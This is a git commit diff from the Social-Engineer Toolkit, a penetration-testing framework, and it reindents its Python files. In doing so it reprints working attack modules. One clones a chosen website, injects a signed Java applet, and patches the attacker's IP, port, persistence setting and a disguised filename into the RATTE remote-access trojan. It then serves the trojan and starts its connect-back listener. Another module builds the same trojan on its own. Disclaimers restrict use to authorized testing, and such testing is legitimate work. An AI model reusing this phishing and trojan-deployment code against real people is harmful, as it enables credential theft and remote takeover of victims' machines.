Fixed spacing using reindent.py on all files

TrustedSec 2013-03-16 15:47:25 -04:00
parent 367536ca48
commit b1957556c5
77 changed files with 9815 additions and 9833 deletions


@ -4,8 +4,8 @@ Copyright 2013 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K) @ www.trustedsec.com
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
Any modifications, changes, or alterations to this application is acceptable, however, any public releases utilizing this code must be approved by TrustedSec. Check the LICENSE file for more information.
The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET is a product of TrustedSec, LLC - An Information Security consulting firm located in Cleveland, Ohio.


@ -4,15 +4,15 @@
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2013-03-16 15:24:03.199144 #
# set_config.py generated: 2013-03-16 15:46:18.978776 #
# #
#######################################################################
CONFIG_DATE='2013-03-16 15:24:03.199144'
CONFIG_DATE='2013-03-16 15:46:18.978776'
METASPLOIT_PATH="/opt/metasploit/apps/pro/msf3"
METASPLOIT_DATABASE="postgresql"
ENCOUNT=4


@ -7,9 +7,9 @@ import subprocess
#
choice=raw_input("Do you want to slim the size of SET down? This will remove SET interactive payloads and other executables.\nEnter your choice [yes|no]: ")
if choice == "y" or choice == "yes":
if os.path.isfile("src/payloads/set_payloads/set.payload"):
path = "src/payloads/set_payloads/"
if os.path.isfile("../src/payloads/set_payloads/set.payload"):
path = "../src/payloads/set_payloads/"
subprocess.Popen("rm -rf %s/* 1> /dev/null 2> /dev/null" % (path), shell=True).wait()
print "Done. Be sure to change the set_config to SET_PAYLOADS=OFF"
if os.path.isfile("src/payloads/set_payloads/set.payload"):
path = "src/payloads/set_payloads/"
if os.path.isfile("../src/payloads/set_payloads/set.payload"):
path = "../src/payloads/set_payloads/"
subprocess.Popen("rm -rf %s/* 1> /dev/null 2> /dev/null" % (path), shell=True).wait()
print "Done. Be sure to change the set_config to SET_PAYLOADS=OFF"


@ -23,9 +23,9 @@ definepath = os.getcwd()
# * Booleans should not be quoted
def value_type(value):
""" Determines whether the setting parameter should be quoted. """
return {
'METASPLOIT_PATH':True,
'METASPLOIT_DATABASE':True,
@ -86,17 +86,17 @@ def value_type(value):
}.get(value,"ERROR")
def update_config():
init_file = file("%s/config/set_config" % (definepath), "r")
new_config = file("%s/config/set_config.py" % (definepath), "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
@ -117,9 +117,9 @@ CONFIG_DATE='"""+timestamp+"""'\n""")
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
@ -140,4 +140,3 @@ CONFIG_DATE='"""+timestamp+"""'\n""")
if __name__ == "__main__":
update_config()


@ -32,37 +32,37 @@ httpd=None
#
def start_web_server_tw(directory,port):
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
def stop_web_server_tw():
global httpd
try:
httpd.socket.close()
# handle the exception
except Exception:
httpd.socket.close()
global httpd
try:
httpd.socket.close()
# handle the exception
except Exception:
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
@ -71,164 +71,164 @@ def stop_web_server_tw():
#
def java_applet_attack_tw(website,port,directory,ipaddr):
# clone the website and inject java applet
core.site_cloner(website,directory,"java")
# clone the website and inject java applet
core.site_cloner(website,directory,"java")
############################################
# use customized Ratte nehmen
############################################
############################################
# use customized Ratte nehmen
############################################
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile("src/program_junk/rand_gen"):
# open the file
fileopen=file("src/program_junk/rand_gen", "r")
# start a loop
for line in fileopen:
# define executable name and rename it
filename=line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile("src/program_junk/rand_gen"):
# open the file
fileopen=file("src/program_junk/rand_gen", "r")
# start a loop
for line in fileopen:
# define executable name and rename it
filename=line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen=open("%s/index.html" % (directory), "rb")
data=fileopen.read()
fileopen.close()
filewrite=open("%s/index.html" % (directory), "wb")
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen=open("%s/index.html" % (directory), "rb")
data=fileopen.read()
fileopen.close()
toReplace=core.grab_ipaddress()+":80"
filewrite=open("%s/index.html" % (directory), "wb")
#replace 3 times
filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
filewrite.close()
# start the web server by running it in the background
start_web_server_tw(directory,port)
toReplace=core.grab_ipaddress()+":80"
#replace 3 times
filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
filewrite.close()
# start the web server by running it in the background
start_web_server_tw(directory,port)
#
# Start ratteserver
#
def ratte_listener_start(port):
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
# j0fer 06-27-2012 # while valid_persistence != True:
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
@ -240,35 +240,35 @@ def main():
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return


@ -18,133 +18,132 @@ AUTHOR=" Thomas Werth"
#
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter=0
valid_site = False
valid_ip = False
valid_response = False
input_counter=0
#################
# get User Input
#################
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#################
# get User Input
#################
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
"""try:
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
while ratteport==0 or ratteport > 65535:
print_warning('Port must not be equal to javaport!')
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
except ValueError:
ratteport=8080"""
"""try:
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
while ratteport==0 or ratteport > 65535:
print_warning('Port must not be equal to javaport!')
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
except ValueError:
ratteport=8080"""
try:
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
except ValueError:
#core.print_info("Port set to default of 8080")
ratteport = 8080
try:
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
except ValueError:
#core.print_info("Port set to default of 8080")
ratteport = 8080
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == 'no' or persistent == '' or persistent == 'n':
persistent='NO'
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == 'no' or persistent == '' or persistent == 'n':
persistent='NO'
else:
persistent='YES'"""
while valid_response != True:
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent=str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent="NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent="YES"
valid_response = True
else:
persistent='YES'"""
print_warning(text.YES_NO_RESPONSES)
while valid_response != True:
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent=str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent="NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent="YES"
valid_response = True
else:
print_warning(text.YES_NO_RESPONSES)
valid_response = False
valid_response = False
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr,ratteport,persistent,customexe)
############
# prepare RATTE
############
prepare_ratte(ipaddr,ratteport,persistent,customexe)
print_status("Payload has been exported to src/program_junk/ratteM.exe")
print_status("Payload has been exported to src/program_junk/ratteM.exe")
###################
# start ratteserver
###################
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)"""
while valid_response != True:
prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt=str.lower(prompt)
if prompt == "no" or prompt == "n":
prompt="NO"
print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
###################
# start ratteserver
###################
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)"""
while valid_response != True:
prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt=str.lower(prompt)
if prompt == "no" or prompt == "n":
prompt="NO"
print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")


@ -10,6 +10,7 @@ version 4.7.1
* standardized metasploit_shellcode to a setcore library and now being used by create_payload.py and powershell/prep.py
* added additional standard ports to the powershell_injection since its much faster to generate now.
* added a new config option called DNS_SERVER which allows you to configure SET as a DNS server and hae all traffic route through it. Just turn it on and you have a full fledged DNS server running.
* fixed indentiation of all python files to standard 4 spaces using reindent.py (thanks Siarc)
~~~~~~~~~~~~~~~~
version 4.7

188
set

@ -10,15 +10,15 @@ import shutil
import re
if not os.path.isdir("reports/"):
os.makedirs("reports")
os.makedirs("reports")
# check to see if we have python-pycrypto
try:
from Crypto.Cipher import AES
from Crypto.Cipher import AES
except ImportError:
print "[!] The python-pycrypto python module not installed. You will loose the ability to use multi-pyinjector."
pass
print "[!] The python-pycrypto python module not installed. You will loose the ability to use multi-pyinjector."
pass
#########################################
@ -39,8 +39,8 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# change permissions if nix
subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
start_dns()
@ -49,18 +49,18 @@ start_dns()
for root, dirs, files in os.walk('src/program_junk/'):
for f in files:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
# if they are being used then ignore
except: pass
# loop through all the directories
for d in dirs:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except: pass
# if windows then do some stuff
@ -70,13 +70,13 @@ if operating_system == "posix":
# ROOT CHECK
################################################
if os.geteuid() != 0:
print "\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)"
print "\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n"
exit_set()
if os.geteuid() != 0:
print "\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)"
print "\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n"
exit_set()
if operating_system != "windows":
check_pexpect()
check_pexpect()
# if there isn't a set_config.py file yet, create one
if not os.path.isfile("config/set_config.py"):
@ -92,102 +92,102 @@ filewrite.write("{This is the main SET configuration file for all options used i
filewrite.close()
try:
# Remove old Signed_Updates
if os.path.isfile("src/program_junk/Signed_Update.jar"):
os.remove("src/program_junk/Signed_Update.jar")
# Remove old Signed_Updates
if os.path.isfile("src/program_junk/Signed_Update.jar"):
os.remove("src/program_junk/Signed_Update.jar")
# intitial user menu
if not os.path.isfile("src/agreement4"):
fileopen = file("readme/LICENSE", "r")
for line in fileopen:
print line.rstrip()
# intitial user menu
if not os.path.isfile("src/agreement4"):
fileopen = file("readme/LICENSE", "r")
for line in fileopen:
print line.rstrip()
print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
print bcolors.ENDC
else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
while 1:
show_banner(define_version,'1')
show_main_menu = create_menu(text.main_text, text.main_menu)
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
print bcolors.ENDC
else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
# special case of list item 99
print '\n 99) Exit the Social-Engineer Toolkit\n'
while 1:
show_banner(define_version,'1')
show_main_menu = create_menu(text.main_text, text.main_menu)
# mainc ore menu
main_menu_choice = (raw_input(setprompt("0", "")))
# special case of list item 99
print '\n 99) Exit the Social-Engineer Toolkit\n'
# funny
if main_menu_choice == "hugs":
print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = raw_input("\nPlease give someone a hug then press {return} to continue.")
# mainc ore menu
main_menu_choice = (raw_input(setprompt("0", "")))
# funny2
if main_menu_choice == "derbycon":
print_warning(bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 3.0 -- September 25th through September 29th 2012" + bcolors.ENDC)
pause = raw_input(bcolors.BOLD + "\nDon't miss it! Sep 25 - Sep 29th! Press {return} to continue." + bcolors.ENDC)
# funny
if main_menu_choice == "hugs":
print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = raw_input("\nPlease give someone a hug then press {return} to continue.")
# quit out
if main_menu_choice == 'exit' or main_menu_choice == "99" or main_menu_choice == "quit":
exit_set()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
except: pass
# funny2
if main_menu_choice == "derbycon":
print_warning(bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 3.0 -- September 25th through September 29th 2012" + bcolors.ENDC)
